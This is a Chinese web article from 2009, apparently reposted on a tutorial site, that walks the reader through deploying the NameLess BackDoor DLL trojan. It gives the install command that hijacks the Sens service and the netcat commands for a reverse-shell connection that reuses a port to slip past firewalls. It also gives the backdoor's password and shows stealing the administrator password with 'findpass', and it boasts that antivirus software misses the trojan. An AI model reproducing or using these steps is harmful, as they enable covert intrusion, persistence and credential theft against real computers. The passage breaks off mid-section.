当前位置: 首页 > 图文教程 > 网络安全 > 杀毒防毒 > 气疯安全工具—新兴DLL型木马复仇记

杀毒防毒
U盘(auto病毒)类病毒分析与解决方案
解析魔兽木马Trojan-PSW.Win32.WOW
绕过主动防御 木马病毒刺穿卡巴斯基
总结经典:木马十大藏身地点大搜查
手动清除 chcp.exe病毒 保护 MSN的安全
卡巴斯基KIS 7.0防火墙设置完全攻略
百毒不侵 如何以不变应万变预防病毒
病毒日新月异 六大反病毒技术亟待成熟
守住你的网站 防御DDoS攻击实用指南
提高诺顿杀毒软件速度的五则技巧
安全升级 新版迅雷杀毒方案之详解
病毒非电脑的专利 常见手机病毒分析
卡巴斯基8.0主要特性介绍(附激活码)
几大常见的手机杀毒软件试用横评
三种2008版杀毒软件七大主流功能横评
检测硬盘与内存中病毒痕迹的四种绝招
优化XP使卡巴斯基7.0单机版运行流畅
上网不再怕中毒 教你一招克死所有病毒
“色情终结者”病毒专删PC内色情电影
精心设置卡巴斯基 加快杀毒速度

杀毒防毒 中的 气疯安全工具—新兴DLL型木马复仇记


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-10-28   浏览: 31 ::
收藏到网摘: n/a

 

  NameLess BackDoor是一款新兴的DLL型木马,这个木马出世没多久,但绝对是一匹极有潜质的千里驹。

  说起NameLess BackDoor的前身来,不得不提及榕哥的BITS和WinEggDrop的PortLess。这两款大名鼎鼎的木马曾经都风光一时,可以说是木马界的元老了。而NameLess BackDoor则是汇集了上面这两款木马的优点,在目标机器的进程管理器中看不到,平时没有端口,提供正向连接和反向连接两种功能。同时NameLess BackDoor又去除了各处的缺点,比如反弹的cmd.exe进程,在目标机器的进程管理中也可以隐藏无需利用BITS服务等(马儿:不开端口,无进程,看看防火墙和杀毒软件还能拿我怎么办!气死你,哈哈)。

  NameLess BackDoor实战演练

  将NameLess BackDoor安装上远程主机到连接木马控制主机,就像一场进行在杀毒软件和防火墙眼皮底下,却又无声无悄的暗战。

  一、随风潜入夜——安装

  下载NameLess BackDoor木马,压缩包中有两个名为NameLess.dll的DLL文件,一个Pack压缩加过壳的,一个是Unpack未压缩加壳的。先在本地用各种杀毒软件扫描一下这两个文件(笔者用的是最新病毒库的KV2005),但是一向以杀毒能力著称的KV2005竟然对这两个木马文件视而不见。呵,这下子可以放心的在任何环境下进行安装了。

  怎么将木马安装到远程的电脑上呢?当然最简单的就是扫描要攻击电脑上的系统漏洞,然后进行攻击入侵控制。方法很多了,反正你拿到远程主机的控制权后,将上面的任意一个“NameLess.dll”文件上传到远程主机上的。在这里笔者是使用Ttelnet远程连接后,写入一个FTP下载的BAT文件,直接在本地建立了一个FTP服务器,通过FTP服务器下载上传文件的(这些内容以前杂志介绍过,这里就不作过多的讲解啦)。下面重点来看看我是怎样安装木马文件的吧!

  在远程Ttelnet命令窗口中切换到文件上传目录中,并输入如下命令(如图1):

  Rundll32 NameLess.dll,Install

  执行该命令后后门就被安装成功了,后门会自动替换系统服务Sens的ServiceDll文件,在电脑重启后以Svchost.exe启动。

  小提示:由于NameLess BackDoor是一个DLL型木马,因此在安装和启动的过程中,远程主机上的杀毒软件不会有任何提示和反应。

  二、穿墙细无声——连接

  安装和启动的过程中顺利地搞定了杀毒软件,下面看看NameLess BackDoor怎么让防火墙无能为力的。
 
  小提示:NameLess BackDoor有两种连接方式:正向连接和反向连接,其中反向方式连接可以让防火墙不会发出任何提示。同时NameLess BackDoor在连接后门时使用了端口复用技术,通过重用系统进程开放的任意一个端口,因此可以轻松的穿透各种防火墙。

  我们首先需要扫描远程主机上开放了哪些端口,假设某台远程主机(IP地址为:192.168.1.11)上开放了139端口,那么可以本地打开一个命令窗口,切换到瑞士军刀NC所在的目录中,运行如下命令:

  nc
  -l -p 12345

  命令执行后将在本地监听12345端口,然后再打开一个命令窗口,输入如下命令(如图2):

  nc 192.168.1.11 139

  建立连接后输入如下内容(如图3):

  dargun|192.168.1.11:12345

  其中的IP地址可根据具体情况进行更改。命令执行后,在刚才的监听窗口中就可以看到出现了连接提示:“Enter Password:”,输入密码158352692后就可以成功的登陆远程主机而不被防火墙发现了!(如果我是防火墙,一定气疯了,哈)

  三、为我所欲为——控制

  成功“气死”杀毒软件和“逼疯”防火墙后,现在就可以控制远程主机了。NameLess

  BackDoor的强大也体现在它的控制功能上,连接登陆远程主机后,输入help命令,即可看到详细的命令帮助信息(如图4)。如果你使用过winshell或wineggdropshell的话,应该对这种模式的后门就不会陌生,不过就算从来没有使用过这样的后门,也会感觉很简单的。

  1.巧盗管理员密码

  连接上远程主机后该干什么呢?我得好好想一想……呵呵,看看管理员的密码是多少吧!

  在命令窗口中直接输入“findpass”命令,很快就可以看到管理员的密码了(如图5),真是够简单的